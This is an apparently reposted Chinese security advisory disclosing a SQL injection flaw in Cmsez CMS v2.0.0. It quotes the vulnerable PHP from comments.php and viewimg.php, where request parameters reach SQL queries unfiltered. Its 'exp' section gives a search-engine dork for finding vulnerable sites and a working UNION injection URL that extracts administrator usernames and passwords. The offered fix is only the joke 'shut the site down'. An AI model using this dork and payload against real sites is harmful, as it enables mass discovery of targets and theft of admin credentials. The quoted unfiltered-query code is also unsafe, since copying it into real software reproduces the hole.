Cmsez(随易)全站系统 0day -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

    零客网络安全小组www . 0kee . com或者以超连接方式注明

    ---------------------------------灰常不 的割JJ线-------------------------------

    程序名称:Cmsez Web Content Manage System v2.0.0

    漏洞发现:小帥(小帅)

    公布时间:08-03-14

    漏洞影响:严重

    漏洞文件:comments.php viewimg.php

    官方站点:http://www.cmsez.com/

    漏洞代码:

    ---------------

   

    //comments

    include "mainfile.php";

    $art=new article();

    //设定

    $confirm='yes';//yes:需要管理员认证后才能显示,no:直接显示

    $member=new member();

    $user_info=$member->member_auth();

    $ulevel=$user_info[user_level];

    ########设置#############

    $action = $_REQUEST[action];

    $page="10";//

    $need_user = "0";//

    $id = $_REQUEST[id];// //对ID参数完全没过滤

    $fdb = $PlusDB->prefix(forum);//评论的数据库

    switch($action){

    case "showNum":

    $sql="select count(*) as num from ".$fdb." where post_aid='$id'";

    $showNum=$PlusDB->getone($sql);

    echo "

    function comment(id)

    {

    var page = \"".PLUS_URL."/comments.php?id=\" + id ;

    popwin = window.open(page,\"\",\"width=460,height=500,scrollbars,resizable\")

    popwin.focus();

    }

    document.open();

    document.write(\""._LANG_0931." $showNum "._LANG_0932."\");

    document.close();";

    break;

    case "saveComment":

    --------------

    viewimg.php

    --------------

   

    //image.php 显示附件的图片

    include "mainfile.php";

    $member=new member();

    $confirm==false;//true 会员才能看,false 都能看

    $user_info = $member->member_auth();

    if($user_info[user_level]=="Guest" && $confirm==true){

    include "modules/member/index.php";

    }else{

    $imgdb = $PlusDB->prefix(images);

    $id=$_GET[id]; //米过滤,为什么他要直接获得啊!

    $aid = $_GET[aid]; //难道赶着吃晚饭?

    $sql="select id from $imgdb where aid=$aid order by id ";

    ---------------------

    exp:

    allinurl:"owered by CMSEZ" comments.php inurlowered by CMSEZ

    http://localhost/comments.php?id=1111111111111/**/union/**/1,concat(name,0x3a,pass),2,3,4/**/from/**/admin/*

    -------------------

    修复方案:

    最好把站关了...

最新文章